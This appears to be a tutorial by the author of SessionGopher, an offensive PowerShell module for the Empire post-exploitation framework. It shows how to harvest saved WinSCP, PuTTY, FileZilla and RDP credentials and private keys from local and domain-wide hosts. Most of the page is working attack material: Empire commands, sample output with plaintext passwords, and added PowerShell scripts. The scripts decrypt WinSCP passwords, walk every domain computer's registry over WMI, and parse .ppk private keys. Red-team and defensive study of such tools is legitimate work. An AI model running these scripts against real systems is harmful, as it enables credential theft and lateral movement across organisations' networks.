SessionGopher is now part of PowerShell Empire 2.0. Here’s how to use the module.
Some background: SessionGopher is a PowerShell tool that extracts saved sessions and passwords from WinSCP, RDP, FileZilla, PuTTY and SuperPuTTY, and from .rdp, .ppk and .sdtid files. It automatically deobfuscates stored passwords where the tool's storage format allows it, and helps you find Unix systems and jump boxes.
Once you have your agent, all that's left to do is run
(Empire: [agent]) > usemodule credentials/sessiongopher
(Empire: powershell/credentials/sessiongopher) > run
[SessionGopher ASCII-art gopher banner]
SessionGopher
Brandon Arvanaghi
Twitter: @arvanaghi | arvanaghi.com
WinSCP Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Session : adm-angela@192.168.43.21
Hostname : 192.168.43.21
Username : adm-angela
Password : dw!ghtB33ts
FileZilla Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Name : Affiliate Jump Box
Password : d3ad0nb4lls@ccurat3
Host : 198.143.22.9
User : MonaLisaVito
Protocol : Use SFTP
Port : 22
Microsoft Remote Desktop (RDP) Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Hostname : dc01
Username : CORP\ProfessorX
Source : WIN7-BARVANAGHI\ProfessorX
Hostname : exchange001
Username : CORP\ProfessorX
PuTTY Sessions
Source : WIN7-BARVANAGHI\ProfessorX
Session : Point of Sale Device
Hostname : 10.25.84.31
SuperPuTTY Sessions
Source : WIN7-BARVANAGHI\DrOctopus
SessionId : Design Computer
SessionName : Design Computer
Host : 192.168.20.166
Username : root
ExtraArgs : -pw kleen3x41
Port : 22
Putty Session : Default Settings
Running as admin lets SessionGopher extract sessions for other domain users who have logged on to that host, not just the user the agent runs as. This is done by querying the HKEY_USERS hive, which holds one subkey, named by SID, for each user hive that is loaded on the host. These subkeys store the saved session information for the tools above. Admin accounts can read every subkey there, while a non-privileged account can read only its own. One caveat: a user's hive (NTUSER.DAT) is loaded at logon and normally unloaded at logoff, so a profile that is not loaded when the module runs does not appear under HKEY_USERS unless something loads it first; the saved-session data still sits in that user's NTUSER.DAT on disk.
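As an added illustration of what that registry walk looks like, here is a small PowerShell script written for this page (it is not SessionGopher's code) that enumerates the hives loaded under HKEY_USERS, maps each SID to a profile name through ProfileList, and reads the PuTTY and WinSCP saved sessions from each one, including WinSCP's password deobfuscation. It assumes the registry paths current PuTTY and WinSCP builds use (Software\SimonTatham\PuTTY\Sessions and Software\Martin Prikryl\WinSCP 2\Sessions) and that you run it elevated if you want hives other than your own. The function names and the hex test vector are this example's own; the vector was built by hand to wrap the password s3cret for user bob on host 10.0.0.5.

```powershell
# Added example for this page, not SessionGopher's own code.
# Assumes current PuTTY/WinSCP registry layouts; needs local admin to read other users' hives.

function ConvertFrom-WinSCPPassword {
    param([string]$HostName, [string]$UserName, [string]$HexPassword)
    # WinSCP stores Password as hex. Each byte is ((~c) XOR 0xA3), which is c XOR 0x5C.
    # Decoded layout: flag (0xFF), dummy, length, skip, <skip> random bytes, then
    # <length> bytes of UserName+HostName+password. The decoder also accepts the
    # flag-less variant, where the first byte is the length and no key is prepended.
    $bytes = @(for ($i = 0; $i + 1 -lt $HexPassword.Length; $i += 2) {
        [Convert]::ToByte($HexPassword.Substring($i, 2), 16) -bxor 0x5C
    })
    if ($bytes.Count -lt 4) { return $null }
    $pos = 0
    $flag = $bytes[$pos]; $pos++
    if ($flag -eq 0xFF) { $pos++; $length = $bytes[$pos]; $pos++ } else { $length = $flag }
    $skip = $bytes[$pos]; $pos += 1 + $skip
    if ($length -eq 0 -or $pos + $length -gt $bytes.Count) { return $null }
    $plain = -join [char[]]$bytes[$pos..($pos + $length - 1)]
    if ($flag -eq 0xFF) {
        # The key (UserName + HostName) is prepended before obfuscation; a mismatch
        # means the value did not come from this session entry.
        $key = $UserName + $HostName
        if (-not $plain.StartsWith($key, [StringComparison]::Ordinal)) { return $null }
        $plain = $plain.Substring($key.Length)
    }
    return $plain
}

function Get-SavedSessionsFromHKU {
    # SID -> profile folder name, so each result can be attributed to a user.
    $profiles = @{}
    Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList' | ForEach-Object {
        $imagePath = (Get-ItemProperty $_.PSPath).ProfileImagePath
        if ($imagePath) { $profiles[$_.PSChildName] = Split-Path $imagePath -Leaf }
    }
    # Only hives loaded right now are listed here. Non-admins can read only their own;
    # the *_Classes keys carry no session data and are skipped.
    $hives = Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' }
    foreach ($hive in $hives) {
        $sid  = $hive.PSChildName
        $user = if ($profiles.ContainsKey($sid)) { $profiles[$sid] } else { $sid }
        $software = "Registry::HKEY_USERS\$sid\Software"

        Get-ChildItem "$software\SimonTatham\PuTTY\Sessions" -ErrorAction SilentlyContinue | ForEach-Object {
            $s = Get-ItemProperty $_.PSPath
            [pscustomobject]@{ Tool = 'PuTTY'; User = $user
                Session = [uri]::UnescapeDataString($_.PSChildName)
                Hostname = $s.HostName; Username = $s.UserName; Password = $null }
        }
        Get-ChildItem "$software\Martin Prikryl\WinSCP 2\Sessions" -ErrorAction SilentlyContinue | ForEach-Object {
            $s = Get-ItemProperty $_.PSPath
            $pw = if ($s.Password) { ConvertFrom-WinSCPPassword $s.HostName $s.UserName $s.Password } else { $null }
            [pscustomobject]@{ Tool = 'WinSCP'; User = $user
                Session = [uri]::UnescapeDataString($_.PSChildName)
                Hostname = $s.HostName; Username = $s.UserName; Password = $pw }
        }
    }
}

# Constructed test vector (not from a real host): the scheme above applied by hand to
# user 'bob', host '10.0.0.5', password 's3cret', with no padding bytes.
ConvertFrom-WinSCPPassword -HostName '10.0.0.5' -UserName 'bob' -HexPassword 'A35C4D5C3E333E6D6C726C726C72692F6F3F2E3928'

Get-SavedSessionsFromHKU | Format-Table -AutoSize
```

Run it once unelevated and once elevated; the difference in how many hives come back is the admin point above in practice. The decoder returns $null when the UserName+HostName prefix does not match, mirroring WinSCP's own check.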
Query remote hosts using WMI
To run SessionGopher against remote hosts from your agent, use one of the Target, AllDomain, or iL arguments. All three use WMI to query the remote hosts in question, so they run quietly: no payload is pushed to the queried hosts, and the registry reads go over the WMI service that is already running there. Quiet is not silent, though; the DCOM/RPC traffic is visible on the network, and WMI activity can be logged on the target (the Microsoft-Windows-WMI-Activity event channels). Note that all three of these arguments require admin privileges on the remote hosts they query, because remote WMI access is restricted to local administrators by default.
AllDomain (switch)
This is where the magic happens. AllDomain runs SessionGopher across every computer in the domain, effectively providing a mapping of the entire domain for you through saved sessions. Beyond credentials, the output of AllDomain should yield the locations of jump boxes and Unix systems in the environment. If the domain's computer list includes stale or offline machines, those queries will time out, so expect a run over a large domain to take a while.
(Empire: powershell/credentials/sessiongopher) > set AllDomain True
(Empire: powershell/credentials/sessiongopher) > run
[+] Digging on DC02...
Microsoft RDP Sessions
Source : DC02\Professorx
Hostname : dc01
Username : CORP\ProfessorX
[+] Digging on WEB01...
[+] Digging on MAIL01...
[+] Digging on WIN7-CLIENT03...
WinSCP Sessions
Source : WIN7-CLIENT03\JimmyMcGill
Session : saulgoodman@192.168.14.80
Hostname : 192.168.14.80
Username : saulgoodman
Password : gravit4s
Microsoft RDP Sessions
Source : WIN7-CLIENT03\JimmyMcGill
Hostname : 10.20.30.35
Username : CORP\Saul.Goodman
PuTTY Sessions
Source : WIN7-CLIENT03\MikeEhrmantraut
Session : Cash_Register
Hostname : 10.14.21.90
... etc ...
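The remote side, as an added example for this page rather than SessionGopher's or Empire's own code: a PowerShell script that pulls the computer list from Active Directory with an ADSI query and then, over remote WMI using the StdRegProv class, enumerates the loaded user hives on each host and reads the hostnames of its saved PuTTY sessions, producing the same kind of jump-box map AllDomain gives you. It assumes local admin on each target (pass a credential to use a different account, as the u and p options do) and the standard PuTTY registry path (Software\SimonTatham\PuTTY\Sessions); function names are this example's own.

```powershell
# Added example for this page, not SessionGopher's or Empire's own code.
# Needs local admin on every target (WMI over DCOM/RPC); set $cred to run as another account.

$HKU  = [uint32]2147483651   # HKEY_USERS, as StdRegProv numbers the hives
$HKLM = [uint32]2147483650   # HKEY_LOCAL_MACHINE

function Get-DomainComputerNames {
    # LDAP search for every computer object in the current domain (no RSAT needed).
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter = '(objectCategory=computer)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.Add('dNSHostName')
    foreach ($result in $searcher.FindAll()) {
        $name = $result.Properties['dnshostname']
        if ($name.Count -gt 0) { $name[0] }
    }
}

function Get-RemotePuTTYSessions {
    param([string]$ComputerName, $Credential)
    $wmi = @{ ComputerName = $ComputerName; Namespace = 'root\default'; Class = 'StdRegProv'; ErrorAction = 'Stop' }
    if ($Credential) { $wmi['Credential'] = $Credential }

    # EnumKey on HKEY_USERS with an empty subkey name lists the loaded hives (SIDs).
    $sids = (Invoke-WmiMethod @wmi -Name EnumKey -ArgumentList $HKU, '').sNames |
        Where-Object { $_ -match '^S-1-5-21-' -and $_ -notmatch '_Classes$' }
    foreach ($sid in $sids) {
        # Attribute the hive to a user via the ProfileList entry for that SID.
        $profileKey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$sid"
        $profile = (Invoke-WmiMethod @wmi -Name GetExpandedStringValue -ArgumentList $HKLM, $profileKey, 'ProfileImagePath').sValue
        $user = if ($profile) { Split-Path $profile -Leaf } else { $sid }

        $sessionsKey = "$sid\Software\SimonTatham\PuTTY\Sessions"
        $names = (Invoke-WmiMethod @wmi -Name EnumKey -ArgumentList $HKU, $sessionsKey).sNames
        foreach ($name in $names) {
            $target = (Invoke-WmiMethod @wmi -Name GetStringValue -ArgumentList $HKU, "$sessionsKey\$name", 'HostName').sValue
            if ($target) {
                [pscustomobject]@{
                    Source   = "$ComputerName\$user"
                    Session  = [uri]::UnescapeDataString($name)   # PuTTY stores names URL-encoded
                    Hostname = $target
                }
            }
        }
    }
}

$cred = $null   # e.g. $cred = Get-Credential 'CORP\Bruce.Wayne' to query as a different account
foreach ($computer in Get-DomainComputerNames) {
    Write-Host "[+] Digging on $computer..."
    try   { Get-RemotePuTTYSessions -ComputerName $computer -Credential $cred | Format-Table -AutoSize }
    catch { Write-Warning "$computer`: $($_.Exception.Message)" }   # offline, access denied, RPC filtered...
}
```

Each hive costs several WMI round trips, so over a large domain this is slow and easy to spot for anyone watching for remote registry access over WMI; that is also the reason the module warns against combining AllDomain with Thorough.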
Target
Target runs SessionGopher against a specific remote host you provide.
(Empire: powershell/credentials/sessiongopher) > set Target WIN7-CLIENT01.corp.com
(Empire: powershell/credentials/sessiongopher) > run
... output ...
iL
To specify a set of hosts to run against, provide a path to a .txt file on the host where the agent is running (the "remote host" from the Empire server's point of view) which contains hostnames separated by newlines.
(Empire: powershell/credentials/sessiongopher) > set iL C:\Users\Professor X\Tmp\hosts.txt
(Empire: powershell/credentials/sessiongopher) > run
... output ...
Additional arguments
Thorough (switch)
Use Thorough in combination with any other set of arguments to search the entire filesystem for .rdp, .ppk, and .sdtid files. Since it walks the whole filesystem of each host, it is slow, and it is not recommended that you use Thorough when querying more than a few hosts at a time. Thorough output automatically parses .ppk and .rdp files and extracts the relevant session details and private key, like so:
(Empire: powershell/credentials/sessiongopher) > set Thorough True
(Empire: powershell/credentials/sessiongopher) > run
PuTTY Private Key Files (.ppk)
Path : C:\Users\Brandon Arvanaghi\Documents\mykey.ppk
Protocol : ssh-rsa
Comment : rsa-key-20170116
Private Key Encryption : none
Private Key : {AAABAEazxtDz6E9mDeONOmz07sG/n1eS1pjKI8fOCuuLnQC58LeCTlysOmZ1/iC4, g4HyRpmdKJGhIxj66/RQ135hVesyk02StleepK4+Tnvz3zmdr4Do5W99qKkrWI3D, T9GOxOIoR9Zc6j57D+fdesJq4ItEIxcQZlXC1F9KZcbXjSJ3iBmCsbG/aRJmMJNx, nCMaZkySr4R4Z/E+l1JOzXaHh5WQ2P0K4YM1/6XG6C4VzDjvXwcY67MYsobTeCR2...}
Private MAC : b7e47819fee39a95eb374a97f939c3c868f880de
Microsoft Remote Desktop .rdp Files
Path : C:\Users\Brandon Arvanaghi\Desktop\config\PenTestLab-Win.RDP
Hostname : dc01.corp.hackerplaypen.com
Gateway : rds01.corp.hackerplaypen.com
Prompts for Credentials : No
Administrative Session : Does not connect to admin session on remote host
... output ...
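For the file side of Thorough, here is an added example written for this page (not SessionGopher's own parser) that reads the fields shown above out of PuTTY .ppk and Microsoft .rdp files. The two sample files are constructed inline: the base64 lines in the .ppk sample are placeholder text, not a real key, and its MAC is made up. The function names are this example's own.

```powershell
# Added example for this page, not SessionGopher's own parser. Sample files are constructed.

function Read-PpkFile {
    param([string[]]$Lines)
    # PuTTY key file layout: "PuTTY-User-Key-File-N: <algorithm>", Encryption, Comment,
    # "Public-Lines: N" followed by N base64 lines, "Private-Lines: N" followed by N
    # lines (encrypted unless Encryption is none), then "Private-MAC: <hex>".
    $info = [ordered]@{ Protocol = $null; Encryption = $null; Comment = $null
                        PublicKey = ''; PrivateKey = ''; PrivateMAC = $null }
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        switch -Regex ($Lines[$i]) {
            '^PuTTY-User-Key-File-\d+:\s*(\S+)' { $info.Protocol   = $Matches[1] }
            '^Encryption:\s*(.+)$'              { $info.Encryption = $Matches[1].Trim() }
            '^Comment:\s*(.*)$'                 { $info.Comment    = $Matches[1].Trim() }
            '^(Public|Private)-Lines:\s*(\d+)'  {
                # Gather the N lines that follow this header and skip past them.
                $n = [int]$Matches[2]
                $blob = if ($n -gt 0) { -join $Lines[($i + 1)..($i + $n)] } else { '' }
                if ($Matches[1] -eq 'Public') { $info.PublicKey = $blob } else { $info.PrivateKey = $blob }
                $i += $n
            }
            '^Private-MAC:\s*([0-9a-fA-F]+)'    { $info.PrivateMAC = $Matches[1] }
        }
    }
    [pscustomobject]$info
}

function Read-RdpFile {
    param([string[]]$Lines)
    # .rdp settings are "name:type:value" lines; type s = string, i = integer, b = binary.
    $settings = @{}
    foreach ($line in $Lines) {
        if ($line -match '^([^:]+):([sib]):(.*)$') { $settings[$Matches[1].Trim()] = $Matches[3].Trim() }
    }
    [pscustomobject]@{
        Hostname              = $settings['full address']
        Gateway               = $settings['gatewayhostname']
        Username              = $settings['username']
        PromptsForCredentials = if ($settings['prompt for credentials'] -eq '1') { 'Yes' } else { 'No' }
        AdministrativeSession = if ($settings['administrative session'] -eq '1') { 'Connects to admin session on remote host' } else { 'Does not connect to admin session on remote host' }
    }
}

# Constructed samples (not captured from a real system; key material is placeholder text).
$ppkText = @'
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20170116
Public-Lines: 2
AAAAB3NzaC1yc2EAAAABJQAAAQEAplaceholder+public+line+one
AAAAplaceholder+public+line+two==
Private-Lines: 2
AAABAEazplaceholder/private/line/one
AAAAplaceholder/private/line/two=
Private-MAC: 0123456789abcdef0123456789abcdef01234567
'@
$rdpText = @'
full address:s:dc01.corp.hackerplaypen.com
gatewayhostname:s:rds01.corp.hackerplaypen.com
username:s:CORP\ProfessorX
prompt for credentials:i:0
administrative session:i:0
screen mode id:i:2
'@
$ppkLines = $ppkText -split "`r?`n"
$rdpLines = $rdpText -split "`r?`n"

Read-PpkFile $ppkLines | Format-List
Read-RdpFile $rdpLines | Format-List

# Sweeping the filesystem the way Thorough does (slow on large disks). Files saved by
# mstsc are often UTF-16; Get-Content picks that up from the byte-order mark.
# Get-ChildItem C:\ -Recurse -Include *.ppk, *.rdp -File -ErrorAction SilentlyContinue |
#     ForEach-Object { if ($_.Extension -eq '.ppk') { Read-PpkFile (Get-Content $_.FullName) } else { Read-RdpFile (Get-Content $_.FullName) } }
```

The Encryption field is the one to look at first: a .ppk with Encryption none is a usable private key as found, while an encrypted one still needs the passphrase, and the Private-MAC line is computed over the key and comment, so it does not help recover the passphrase.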
u and p
To run the remote queries (Target, iL, or AllDomain) in the context of a user account other than the one the beaconing agent runs as, specify a username and password. The credentials are used for the WMI connection to the remote hosts, so the account needs admin rights there.
(Empire: powershell/credentials/sessiongopher) > set u CORP\Bruce.Wayne
(Empire: powershell/credentials/sessiongopher) > set p ImB@tm@n43~
(Empire: powershell/credentials/sessiongopher) > run
... output ...
To see all these options together, enter options.
(Empire: powershell/credentials/sessiongopher) > options

Name       Required  Value     Description
----       --------  -------   -----------
p          False               Password for user account (if -u argument provided).
u          False               User account (e.g. corp.com\jerry) for when using -Target,
                               -iL, or -AllDomain. If not provided, uses current security
                               context.
Thorough   False               Switch. Searches entire filesystem for .ppk, .rdp, .sdtid
                               files. Not recommended to use with -AllDomain due to time.
o          False               Switch. Drops a folder of all output in .csvs on remote
                               host.
AllDomain  False               Switch. Run against all computers on domain. Uses current
                               security context, unless -u and -p arguments provided.
                               Uses WMI.
iL         False               Provide path to a .txt file on the remote host containing
                               hosts separated by newlines to run remotely against. Uses
                               WMI.
Agent      True      Z9TU5F4A  Agent to run module on.
Target     False               Provide a single host to run remotely against. Uses WMI.
I built SessionGopher for simplicity, so you can expect to run it without setting any values and still get interesting output. Again, running as admin is preferred.
Have fun, and let me know how it goes!